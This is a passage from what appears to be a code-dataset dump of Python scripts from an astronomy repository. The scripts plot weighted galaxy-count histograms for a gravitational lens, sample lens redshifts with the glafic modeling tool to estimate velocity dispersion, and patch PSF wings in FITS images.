output=output+name[k]+\"\\t\"+str(mass_best[k][0])+\"\\t\"+str(mass_inf[k][0])+\"\\t\"+str(mass_med[k][0])+\"\\t\"+str(mass_sup[k][0])+\"\\t\"+str(mass_best[k][1])+\"\\t\"+str(mass_inf[k][1])+\"\\t\"+str(mass_med[k][1])+\"\\t\"+str(mass_sup[k][1])+\"\\t\"\n for j in range(70):\n output=output+str(mass_best[k][j+2])+\"\\t\"+str(mass_inf[k][j+2])+\"\\t\"+str(mass_med[k][j+2])+\"\\t\"+str(mass_sup[k][j+2])+\"\\t\"\n output=output+\"\\n\"\n outfile.write(output)\n outfile.close()\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n \nprint 'Done!'\n" }, { "alpha_fraction": 0.5192500948905945, "alphanum_fraction": 0.6131330728530884, "avg_line_length": 66.88636016845703, "blob_id": "b7a11ad3d10d2d9dc0535027f184750d6cd45060", "content_id": "cfa396991823536427da8d586a2921e9bf8b4287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20909, "license_type": "no_license", "max_line_length": 523, "num_lines": 308, "path": "/python/catalogue_utilities/weightinguniversal_histograms_samplesORIG.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# C.E. Rusu, 12 Feb 2018\n# The code uses the weighted count ratios derived by weightinguniversal_overlap_sampling_nobeta.py to produce histograms and compute statistics. 
For small widths of the averages/medians distributions, where they are approximately gaussian, use this code, otherwise use weightinguniversal_histograms_samples_asymmetric.py instead\n# run as python /Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/weightinguniversal_histograms_samples.py WFI2033 45 5 23 meds bpz deti IRAC 0.61 0.71 100 handpicked\n\nimport numpy as np\nimport sys\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\nlens = str(sys.argv[1])\nradius = str(sys.argv[2])\ninner = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nphotz = str(sys.argv[6])\ndetect = str(sys.argv[7])\nirac = str(sys.argv[8])\nzinf = str(sys.argv[9])\nzsup = str(sys.argv[10])\nbin = int(str(sys.argv[11]))\ntry: handpicked = '_'+str(sys.argv[12])\nexcept: handpicked = ''\n\nplt.clf()\n\nfontlegend = 8\nfontsize = 8\nfontordonate = 4\nfontabsciss = 10\nfontlabel = 4\npltrange = 3\nsamples = 10 # currently only works for 10\nlimit = 10**30\nroot = \"/Volumes/LaCieSubaru/weightedcounts/%s/\" % lens\n\nstart_time = time.time()\n\nprint \"Working on samples:\"\n\nmedsum50W1 = np.zeros((18,samples))\nmedsum75W1 = np.zeros((18,samples))\nmedsum50W2 = np.zeros((18,samples))\nmedsum75W2 = np.zeros((18,samples))\nmedsum50W3 = np.zeros((18,samples))\nmedsum75W3 = np.zeros((18,samples))\nmedsum50W4 = np.zeros((18,samples))\nmedsum75W4 = np.zeros((18,samples))\n\nfor nr in range(samples):\n print '%s/9' %nr\n lstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)] # select from the files in the root directory\n lstW1_75 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW2_75 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW3_50 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW3_75 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW4_75 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n\n if mag == \"24\" and photz == \"bpz\": cols=[4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38]\n if mag == \"24\" and photz == \"eazy\": cols=[40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74]\n if mag == \"23\" and photz == \"bpz\": cols=[5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,39]\n if mag == \"23\" and photz == \"eazy\": 
cols=[41,43,45,47,49,51,53,55,57,59,61,63,65,67,69,71,73,75]\n \n print \"W1...\"\n for i in range(len(lstW1_50)):\n if i == 0:\n q_W1_50read = np.loadtxt(root+lstW1_50[i], usecols=cols, unpack=True)\n else:\n q_W1_50read = np.r_['1',q_W1_50read,np.loadtxt(root+ lstW1_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW1_75)):\n if i == 0:\n q_W1_75read = np.loadtxt(root+lstW1_75[i], usecols=cols, unpack=True)\n else:\n q_W1_75read = np.r_['1',q_W1_75read,np.loadtxt(root+ lstW1_75[i], usecols=cols, unpack=True)]\n \n print \"W2...\"\n for i in range(len(lstW2_50)):\n if i == 0:\n q_W2_50read = np.loadtxt(root+lstW2_50[i], usecols=cols, unpack=True)\n else:\n q_W2_50read = np.r_['1',q_W2_50read,np.loadtxt(root+ lstW2_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW2_75)):\n if i == 0:\n q_W2_75read = np.loadtxt(root+lstW2_75[i], usecols=cols, unpack=True)\n else:\n q_W2_75read = np.r_['1',q_W2_75read,np.loadtxt(root+ lstW2_75[i], usecols=cols, unpack=True)]\n \n print \"W3...\"\n for i in range(len(lstW3_50)):\n if i == 0:\n q_W3_50read = np.loadtxt(root+lstW3_50[i], usecols=cols, unpack=True)\n else:\n q_W3_50read = np.r_['1',q_W3_50read,np.loadtxt(root+ lstW3_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW3_75)):\n if i == 0:\n q_W3_75read = np.loadtxt(root+lstW3_75[i], usecols=cols, unpack=True)\n else:\n q_W3_75read = np.r_['1',q_W3_75read,np.loadtxt(root+ lstW3_75[i], usecols=cols, unpack=True)]\n \n print \"W4...\"\n for i in range(len(lstW4_50)):\n if i == 0:\n q_W4_50read = np.loadtxt(root+lstW4_50[i], usecols=cols, unpack=True)\n else:\n q_W4_50read = np.r_['1',q_W4_50read,np.loadtxt(root+ lstW4_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW4_75)):\n if i == 0:\n q_W4_75read = np.loadtxt(root+lstW4_75[i], usecols=cols, unpack=True)\n else:\n q_W4_75read = np.r_['1',q_W4_75read,np.loadtxt(root+ lstW4_75[i], usecols=cols, unpack=True)]\n \n for j in range(18):\n q_W1_50 = q_W1_50read[j][q_W1_50read[j] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50) # fix the negative halo convergence\n q_W1_75 = q_W1_75read[j][q_W1_75read[j] < limit]\n if mode == \"sum\": q_W1_75 = abs(q_W1_75)\n q_W2_50 = q_W2_50read[j][q_W2_50read[j] < limit]\n if mode == \"sum\": q_W2_50 = abs(q_W2_50) # fix the negative halo convergence\n q_W2_75 = q_W2_75read[j][q_W2_75read[j] < limit]\n if mode == \"sum\": q_W2_75 = abs(q_W2_75)\n q_W3_50 = q_W3_50read[j][q_W3_50read[j] < limit]\n if mode == \"sum\": q_W3_50 = abs(q_W3_50) # fix the negative halo convergence\n q_W3_75 = q_W3_75read[j][q_W3_75read[j] < limit]\n if mode == \"sum\": q_W3_75 = abs(q_W3_75)\n q_W4_50 = q_W4_50read[j][q_W4_50read[j] < limit]\n if mode == \"sum\": q_W4_50 = abs(q_W4_50) # fix the negative halo convergence\n q_W4_75 = q_W4_75read[j][q_W4_75read[j] < limit]\n if mode == \"sum\": q_W4_75 = abs(q_W4_75)\n\n if mode == \"sum\":\n medsum50W1[j][nr] = np.average(q_W1_50)\n medsum75W1[j][nr] = np.average(q_W1_75)\n medsum50W2[j][nr] = np.average(q_W2_50)\n medsum75W2[j][nr] = np.average(q_W2_75)\n medsum50W3[j][nr] = np.average(q_W3_50)\n medsum75W3[j][nr] = np.average(q_W3_75)\n medsum50W4[j][nr] = np.average(q_W4_50)\n medsum75W4[j][nr] = np.average(q_W4_75)\n if mode == \"meds\":\n medsum50W1[j][nr] = np.median(q_W1_50)\n medsum75W1[j][nr] = np.median(q_W1_75)\n medsum50W2[j][nr] = np.median(q_W2_50)\n medsum75W2[j][nr] = np.median(q_W2_75)\n medsum50W3[j][nr] = np.median(q_W3_50)\n medsum75W3[j][nr] = np.median(q_W3_75)\n medsum50W4[j][nr] = np.median(q_W4_50)\n medsum75W4[j][nr] = 
np.median(q_W4_75)\n \nstd50W1 = np.zeros(18)\nstd75W1 = np.zeros(18)\nstd50W2 = np.zeros(18)\nstd75W2 = np.zeros(18)\nstd50W3 = np.zeros(18)\nstd75W3 = np.zeros(18)\nstd50W4 = np.zeros(18)\nstd75W4 = np.zeros(18)\n\nfor i in range(18):\n std50W1[i] = np.std(medsum50W1[i],ddof=1) # ddof=1 stands for sample standard deviation, not population standard deviation\n std75W1[i] = np.std(medsum75W1[i],ddof=1)\n std50W2[i] = np.std(medsum50W2[i],ddof=1)\n std75W2[i] = np.std(medsum75W2[i],ddof=1)\n std50W3[i] = np.std(medsum50W3[i],ddof=1)\n std75W3[i] = np.std(medsum75W3[i],ddof=1)\n std50W4[i] = np.std(medsum50W4[i],ddof=1)\n std75W4[i] = np.std(medsum75W4[i],ddof=1)\n\nprint \"Plotting...\"\n\nplt.suptitle(r'%s weighted counts histogram W1-W4 %s arcsec %s inner %s %s %s %s %s %s zgap %s %s' % (lens, radius, inner, mag, mode, photz, irac, detect, handpicked, zinf, zsup), fontsize=fontsize, y=0.998)\n\nfor i in range(18):\n\n #n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax]) # in case I want to compute the peak\n #n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n #n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n #n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n #n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n #n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n #n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n #n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n \n if i == 0: ax=plt.subplot(5,4,1)\n if i == 1: ax=plt.subplot(5,4,2)\n if i == 2: ax=plt.subplot(5,4,3)\n if i == 3: ax=plt.subplot(5,4,4)\n if i == 4: ax=plt.subplot(5,4,5)\n if i == 5: ax=plt.subplot(5,4,6)\n if i == 6: ax=plt.subplot(5,4,7)\n if i == 7: ax=plt.subplot(5,4,8)\n if i == 8: ax=plt.subplot(5,4,9)\n if i == 9: ax=plt.subplot(5,4,10)\n if i == 10: ax=plt.subplot(5,4,11)\n if i == 11: ax=plt.subplot(5,4,12)\n if i == 12: ax=plt.subplot(5,4,13)\n if i == 13: ax=plt.subplot(5,4,14)\n if i == 14: ax=plt.subplot(5,4,15)\n if i == 15: ax=plt.subplot(5,4,17)\n if i == 16: ax=plt.subplot(5,4,18)\n if i == 17: ax=plt.subplot(5,4,19)\n \n q_W1_50 = q_W1_50read[i][q_W1_50read[i] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50) # fix the negative halo convergence\n q_W1_75 = q_W1_75read[i][q_W1_75read[i] < limit]\n if mode == \"sum\": q_W1_75 = abs(q_W1_75)\n q_W2_50 = q_W2_50read[i][q_W2_50read[i] < limit]\n if mode == \"sum\": q_W2_50 = abs(q_W2_50) # fix the negative halo convergence\n q_W2_75 = q_W2_75read[i][q_W2_75read[i] < limit]\n if mode == \"sum\": q_W2_75 = abs(q_W2_75)\n q_W3_50 = q_W3_50read[i][q_W3_50read[i] < limit]\n 
if mode == \"sum\": q_W3_50 = abs(q_W3_50) # fix the negative halo convergence\n q_W3_75 = q_W3_75read[i][q_W3_75read[i] < limit]\n if mode == \"sum\": q_W3_75 = abs(q_W3_75)\n q_W4_50 = q_W4_50read[i][q_W4_50read[i] < limit]\n if mode == \"sum\": q_W4_50 = abs(q_W4_50) # fix the negative halo convergence\n q_W4_75 = q_W4_75read[i][q_W4_75read[i] < limit]\n if mode == \"sum\": q_W4_75 = abs(q_W4_75)\n \n plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n \n #s = \"50: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\n ##ax.text(0.05, 0.8, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n #s = \"50: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\n ##ax.text(0.05, 0.6, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n #s = \"50: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\n ##ax.text(0.05, 0.4, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n #s = \"50: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\n ##ax.text(0.05, 0.2, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n #s = \"75: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\n ##ax.text(0.05, 0.7, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n #s = \"75: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\n ##ax.text(0.05, 0.5, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n #s = \"75: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\n ##ax.text(0.05, 0.3, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n #s = \"75: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\n ##ax.text(0.05, 0.1, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n\n if mode == \"sum\":\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.average(medsum50W1[i]),std50W1[i],np.average(medsum75W1[i]),std75W1[i])\n ax.text(0.05, 0.9, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.average(medsum50W2[i]),std50W2[i],np.average(medsum75W2[i]),std75W2[i])\n ax.text(0.05, 0.7, s, fontsize=fontlabel, 
color='g',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.average(medsum50W3[i]),std50W3[i],np.average(medsum75W3[i]),std75W3[i])\n ax.text(0.05, 0.5, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.average(medsum50W4[i]),std50W4[i],np.average(medsum75W4[i]),std75W4[i])\n ax.text(0.05, 0.3, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 50: %.3f +/- %.3f\" % (np.average([np.average(medsum50W1[i]),np.average(medsum50W2[i]),np.average(medsum50W3[i]),np.average(medsum50W4[i])]),np.sqrt(np.std([np.average(medsum50W1[i]),np.average(medsum50W2[i]),np.average(medsum50W3[i]),np.average(medsum50W4[i])],ddof=1)**2 + np.average([std50W1[i],std50W2[i],std50W3[i],std50W4[i]])**2)) # the errors include in quadrature the scatter from 10 samplings, and from W1-4, for 50%\n ax.text(0.05, 0.1, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 75: %.3f +/- %.3f\" % (np.average([np.average(medsum75W1[i]),np.average(medsum75W2[i]),np.average(medsum75W3[i]),np.average(medsum75W4[i])]),np.sqrt(np.std([np.average(medsum75W1[i]),np.average(medsum75W2[i]),np.average(medsum75W3[i]),np.average(medsum75W4[i])],ddof=1)**2 + np.average([std75W1[i],std75W2[i],std75W3[i],std75W4[i]])**2))\n ax.text(0.05, 0.0, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n \n if mode == \"meds\":\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.median(medsum50W1[i]),std50W1[i],np.median(medsum75W1[i]),std75W1[i])\n ax.text(0.05, 0.9, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.median(medsum50W2[i]),std50W2[i],np.median(medsum75W2[i]),std75W2[i])\n ax.text(0.05, 0.7, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.median(medsum50W3[i]),std50W3[i],np.median(medsum75W3[i]),std75W3[i])\n ax.text(0.05, 0.5, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.median(medsum50W4[i]),std50W4[i],np.median(medsum75W4[i]),std75W4[i])\n ax.text(0.05, 0.3, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 50: %.3f +/- %.3f\" % (np.average([np.median(medsum50W1[i]),np.median(medsum50W2[i]),np.median(medsum50W3[i]),np.median(medsum50W4[i])]),np.sqrt(np.std([np.median(medsum50W1[i]),np.median(medsum50W2[i]),np.median(medsum50W3[i]),np.median(medsum50W4[i])],ddof=1)**2 + np.average([std50W1[i],std50W2[i],std50W3[i],std50W4[i]])**2)) # the errors include in quadrature the scatter from 10 samplings, and from W1-4, for 50%\n ax.text(0.05, 0.1, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 75: %.3f +/- %.3f\" % (np.average([np.median(medsum75W1[i]),np.median(medsum75W2[i]),np.median(medsum75W3[i]),np.median(medsum75W4[i])]),np.sqrt(np.std([np.median(medsum75W1[i]),np.median(medsum75W2[i]),np.median(medsum75W3[i]),np.median(medsum75W4[i])],ddof=1)**2 + np.average([std75W1[i],std75W2[i],std75W3[i],std75W4[i]])**2))\n ax.text(0.05, 0.0, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n \n if i == 0: plt.xlabel(r'$\\zeta_{gal}$', fontsize=fontabsciss)\n if i == 1: plt.xlabel(r'$\\zeta_{z}$', fontsize=fontabsciss)\n if i == 2: plt.xlabel(r'$\\zeta_{M_\\star}$', fontsize=fontabsciss)\n if i == 3: plt.xlabel(r'$\\zeta_{M^2_\\star}$', fontsize=fontabsciss)\n if i == 4: plt.xlabel(r'$\\zeta_{M^3_\\star}$', fontsize=fontabsciss)\n if i == 5: plt.xlabel(r'$\\zeta_{1/r}$', fontsize=fontabsciss)\n 
if i == 6: plt.xlabel(r'$\\zeta_{z/r}$', fontsize=fontabsciss)\n if i == 7: plt.xlabel(r'$\\zeta_{M_\\star/r}$', fontsize=fontabsciss)\n if i == 8: plt.xlabel(r'$\\zeta_{M^2_\\star/r}$', fontsize=fontabsciss)\n if i == 9: plt.xlabel(r'$\\zeta_{M^3_\\star/r}$', fontsize=fontabsciss)\n if i == 10: plt.xlabel(r'$\\zeta_{M^2_{\\star\\mathrm{,rms}}}$', fontsize=fontabsciss)\n if i == 11: plt.xlabel(r'$\\zeta_{M^3_{\\star\\mathrm{,rms}}}$', fontsize=fontabsciss)\n if i == 12: plt.xlabel(r'$\\zeta_{M^2_{\\star\\mathrm{,rms}}/r}$', fontsize=fontabsciss)\n if i == 13: plt.xlabel(r'$\\zeta_{M^3_{\\star\\mathrm{,rms}}/r}$', fontsize=fontabsciss)\n if i == 14: plt.xlabel(r'$\\zeta_\\mathrm{flexion}$', fontsize=fontabsciss)\n if i == 15: plt.xlabel(r'$\\zeta_\\mathrm{tidal}$', fontsize=fontabsciss)\n if i == 16: plt.xlabel(r'$\\zeta_\\mathrm{SIS}$', fontsize=fontabsciss)\n if i == 17: plt.xlabel(r'$\\zeta_\\mathrm{SIShalo}$', fontsize=fontabsciss)\n if i in [0,4,8,12,15]:\n plt.ylabel(\"Normalized counts\", fontsize=fontordonate)\n plt.tick_params(axis='x', labelsize=4)\n plt.tick_params(axis='y', labelsize=4)\n plt.setp(plt.xticks()[1], rotation=90)\n subplot = i+1\n print \"finished subplot %d/18; fraction of points inside the < %s cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, limit, float(q_W1_50.size)/q_W1_50read[0].size, float(q_W1_75.size)/q_W1_75read[0].size, float(q_W2_50.size)/q_W2_50read[0].size, float(q_W2_75.size)/q_W2_75read[0].size, float(q_W3_50.size)/q_W3_50read[0].size, float(q_W3_75.size)/q_W3_75read[0].size, float(q_W4_50.size)/q_W4_50read[0].size, float(q_W4_75.size)/q_W4_75read[0].size)\n\nplt.subplots_adjust(left=None, bottom=0.1, right=None, top=0.95, wspace=0.4, hspace=0.6)\nplt.subplot(5,4,5)\nplt.legend(bbox_to_anchor=(5, -5), loc='lower right', borderaxespad=0., fontsize=fontlegend)\nplt.savefig('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s.png' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup), dpi=500)\n \nprint(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 64, "blob_id": "92ac44098658e643d956a2836afb94ea665cdc33", "content_id": "70f7c61698f97923e434558d2c990853b2890c7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 64, "license_type": "no_license", "max_line_length": 64, "num_lines": 1, "path": "/python/readme.txt", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "Instructions to get external convergence using weighted counts" }, { "alpha_fraction": 0.5799086689949036, "alphanum_fraction": 0.6287671327590942, "avg_line_length": 35.28333282470703, "blob_id": "35151f41550a9e780e1b298c567cabceeefd8c3f", "content_id": "4aa14b918fcabf2ee7d7f7b4ca29e0b7911bf072", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2190, "license_type": "no_license", "max_line_length": 211, "num_lines": 60, "path": "/python/modeling_utilities/samplezveldisp.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Varies the lens redshift and gets resulting parameters. 
Uses mag2mag to find absolute mag\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\nimport pylab as plt\r\n\nsample=np.linspace(0.1,2.2,22)\n\nlistchi = np.array([])\nlist = np.array([])\nlistmag = np.array([])\nlistvel = np.array([])\n\r\nfilein = \"inlensz.input\"\nfileimag = \"outlensz_point.dat\"\nfileout = \"outlensz_optresult.dat\"\nfileres = \"samplezveldisp.dat\"\n\nfor i in range(len(sample)):\n with open(filein, 'r') as f:\n glafic = f.readlines()\n glafic[9-1] = glafic[9-1].replace(glafic[9-1].split()[1],str(sample[i]))\n with open(filein, 'w') as f:\n f.writelines(glafic)\r\n os.system(\"glafic %s\" % filein)\n\n with open(fileimag, 'r') as f:\n interest = f.readlines()\n if len(interest) == 5: # accept only if the model creates 4 images\n with open(fileout, 'r') as f:\n interest = f.readlines()\n for j in range(len(interest)):\n if \"lens sie\" in interest[j]:\n value = float(interest[j].split()[2])\n if \"chi\" in interest[j]:\n valuechi = float(interest[j].split()[2])\n listchi = np.append(listchi,valuechi)\n list = np.append(list,value)\n#np.savetxt(fileres,np.c_[sample,list,listchi],fmt=\"%.1f %d %.2f\")\n\nimport subprocess\nfor i in range(len(sample)):\n output = subprocess.check_output('$HOME/GITHUB/LensPop/stellarpop/mag2mag.py -vega -T El_cww -m1 17.33 -f1 VISTA_Ks -z1 %s -f2 R_Cousins -z2 0.0; exit 0' % str(sample[i]),stderr=subprocess.STDOUT,shell=True)\n listmag = np.append(listmag,float(output))\n listvel = np.append(listvel,150*((10**((4.65-float(output))/2.5))/(10**10))**0.25)\n\n#Galactic dynamics: log10(sigma/150km/s) = 0.25log10(L_R/(10^10*h_7^-2Lsun)) ->\n#sigma = 150km/s*[L_R/(10^10*Lsun)]^0.25\n#-2.5log10L_R[Lsun] = M_R - M_Rsun ->\n#L_R[Lsun] = 10^[(M_Rsun - M_R)/2.5] ->\n#sigma = 150km/s*[10^[(M_Rsun - M_R)/2.5]/10^10]^0.25\n#M_R Sun in AB from http://mips.as.arizona.edu/~cnaw/sun.html is 4.65\n# scatter in sigma = 0.25*sigma\n\nnp.savetxt(fileres,np.c_[sample,list,listchi,listmag,listvel],fmt=\"%.1f %d %.2f %.2f %d\")\nplt.plot(sample,list)\nplt.plot(sample,listvel)\nplt.show()\n\n\r\n\r\n" }, { "alpha_fraction": 0.6808943152427673, "alphanum_fraction": 0.7012194991111755, "avg_line_length": 29.6875, "blob_id": "70e3725df248b26d6165864e735bac4829ce8f94", "content_id": "51d34ea817c572d000d2d74b415446c983dae7f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 92, "num_lines": 16, "path": "/python/image_utilities/replacewings.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Replace the wings of a PSF with an analytical model, given the PSF, the model and the mask\n\nimport numpy as np\nfrom astropy.io import fits\n\nsky = -256.5 # sky level in the psf\npsf = fits.open('i_psf.fits')\nmask = fits.open('msknegative.fits')\nmodel = fits.open('i_model.fits')\ndata_psf = psf[0].data - sky\ndata_mask = mask[0].data\ndata_model = model[0].data\nout = data_psf\nout[data_mask == 1] = data_model[data_mask == 1]\nmodel[0].data = out\nmodel.writeto('i_psfhybrid.fits',clobber=True)\n\n" }, { "alpha_fraction": 0.5541871786117554, "alphanum_fraction": 0.6149425506591797, "avg_line_length": 54.3636360168457, "blob_id": "b683a078aa0297258ca13dbb3f13450ec26c71e8", "content_id": "6c229968843bf22e0057c2116f3d7dc1c29998aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1218, "license_type": "no_license", "max_line_length": 160, "num_lines": 22, "path": 
